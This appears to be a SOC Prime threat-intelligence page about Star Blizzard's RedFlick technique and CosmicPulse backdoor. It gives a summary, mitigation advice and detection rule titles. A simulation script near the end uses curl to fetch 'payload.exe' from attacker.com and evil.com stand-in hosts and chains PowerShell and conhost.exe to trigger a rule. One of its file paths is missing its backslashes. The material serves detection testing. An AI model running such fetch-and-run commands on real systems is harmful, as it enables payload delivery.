SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

Star Blizzard Uses RedFlick to Enhance Phishing and Malware Deployment

Author Photo
SOC Prime Team linkedin icon Follow
Star Blizzard Uses RedFlick to Enhance Phishing and Malware Deployment
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Russian state-sponsored actor Star Blizzard has evolved its tradecraft using the RedFlick technique to deliver the CosmicPulse backdoor. The actor has shifted from highly targeted spear-phishing to larger-scale automated phishing campaigns using compromised websites. These campaigns utilize sophisticated delivery methods including VHDX files and payloads hidden within PDF files to evade detection.

Investigation

Microsoft Threat Intelligence analyzed various phishing waves observed throughout 2026, identifying a transition from ClickFix-based chains to RedFlick scheduled tasks. The investigation detailed a multi-stage execution flow involving LNK files, SSH local command execution, and the use of WebDAV for remote payload retrieval. Technical analysis also uncovered the use of steganography and registry-based encryption for the CosmicPulse payload.

Mitigation

Organizations should implement phishing-resistant authentication and conditional access policies to secure identities. Endpoint protection should be configured with EDR in block mode and real-time antivirus protection enabled. Additionally, implementing attack surface reduction rules can prevent the execution of obfuscated scripts and unauthorized executable files.

Response

Upon detection, security teams should utilize EDR to remediate malicious artifacts and investigate suspicious sign-in attempts. Automated investigation and remediation modes should be enabled to reduce response times. Organizations should also use advanced anti-phishing solutions and Zero-hour auto purge to neutralize incoming malicious communications.

Attack Flow

We are still updating this part.

Detections

Suspicious Command Line Contains UNC Path with Executable as an Argument (via cmdline)

SOC Prime Team
30 Sep 2026

Possible Network Shares Discovery (via cmdline)

SOC Prime Team
30 Sep 2026

Suspicious MsiExec Remote Installer Hidden Installation Attempts (via cmdline)

SOC Prime Team
30 Sep 2026

LOLBAS Conhost (via cmdline)

SOC Prime Team
30 Sep 2026

Possible Tunneling Tool Usage [Windows] (via cmdline)

SOC Prime Team
30 Sep 2026

Suspicious CURL Usage (via cmdline)

SOC Prime Team
30 Sep 2026

Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)

SOC Prime Team
30 Sep 2026

IOCs (HashSha256) to detect: Star Blizzard refines phishing and malware delivery with the RedFlick technique

SOC Prime AI Rules
30 Sep 2026

IOCs (SourceIP) to detect: Star Blizzard refines phishing and malware delivery with the RedFlick technique

SOC Prime AI Rules
30 Sep 2026

IOCs (DestinationIP) to detect: Star Blizzard refines phishing and malware delivery with the RedFlick technique

SOC Prime AI Rules
30 Sep 2026

Detect PowerShell Execution from Download PDF [Windows Powershell]

SOC Prime AI Rules
30 Sep 2026

Detection of Star Blizzard RedFlick Technique – Scheduled Tasks and Command-Line Execution [Windows Process Creation]

SOC Prime AI Rules
30 Sep 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary delivers a phishing email containing a link to a malicious file. Upon interaction, a sequence is triggered where curl is utilized to fetch a secondary stage. To blend in with system processes, the command is crafted to explicitly include the terms PowerShell, PDF (referencing the source of the trigger), and conhost.exe in the command line string to match the logic of the target detection rule. The goal is to execute a decoded payload embedded within a PDF structure.

  • Regression Test Script:

    # Simulation script to trigger the 'Detect PowerShell Execution from Download PDF' rule.
    # This script constructs a command line string that includes all four required keywords.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}"
    
    # We execute via cmd to ensure conhost.exe is part of the process tree/command context
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`""
  • Cleanup Commands:

    # Cleanup files generated during simulation
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue